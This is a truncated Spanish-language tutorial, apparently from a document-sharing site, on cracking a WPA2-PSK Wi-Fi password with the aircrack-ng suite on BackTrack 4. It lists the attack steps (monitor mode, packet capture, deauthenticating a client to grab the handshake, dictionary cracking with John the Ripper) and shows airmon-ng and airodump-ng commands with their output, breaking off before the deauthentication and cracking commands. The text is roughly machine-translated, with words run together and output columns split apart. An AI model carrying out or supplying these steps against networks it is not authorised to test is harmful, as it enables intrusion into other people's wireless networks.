monster
JOHN EL DESTRIPADOR
●
●
●
●
●
Poner la interfaz en modo monitor
Buscar red inalámbrica (protegida con WPA2 y una clave previamentecompartida)
Capturar todos los paquetes
Espere hasta que vea a un cliente y des-autenticación el cliente, por lo que el
apretón de manos puede ser capturado
Crackear la clave usando un archivo dediccionario (o por medio de John The
Ripper)
Voy a usar una interfaz de Dlink DWL-G122 (USB) de red inalámbrica para este
procedimiento. En backtrack4, este dispositivo se reconoce como wlan0.
Enprimer lugar, poner la tarjeta en modo monitor:
root@bt:~# airmon-ng
Interface
Chipset
Driver
wifi0
ath0
ath1
wlan0
Atheros
Atheros
Atheros
Ralink 2573 USB
madwifi-ng
madwifi-ng VAP(parent: wifi0)
madwifi-ng VAP (parent: wifi0)
rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface
Chipset
Driver
wifi0
ath0
ath1
wlan0
Atheros
Atheros
Atheros
Ralink2573 USB
madwifi-ng
madwifi-ng VAP (parent: wifi0)
madwifi-ng VAP (parent: wifi0)
rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok ahora podemos utilizar la interfaz mon0
Vamos aencontrar una red inalámbrica que utiliza WPA2 / PSK:
root@bt:~# airodump-ng mon0
CH
6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID
PWR
Beacons
#Data, #/s
CH
MB
ENC
00:19:5B:52:AD:F7-33
5
0
10
54
WPA2 CCMP
BSSID
STATION
PWR
Rate
Lost
Packets
00:19:5B:52:AD:F7
00:1C:BF:90:5B:A3
-29
0- 1
12
4
0
CIPHER AUTH ESSID
PSKTestNet
Probe
TestNet
Dejar de airodump-ng y ejecutar de nuevo, escribiendo todos los paquetes en el disco:
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
En estepunto, usted tiene dos opciones: o bien esperar a que un cliente se conecta y
el 4-Way Handshake se haya completado, o des-autenticación un cliente existente, por lo
que la fuerza para volver a...
Regístrate para leer el documento completo.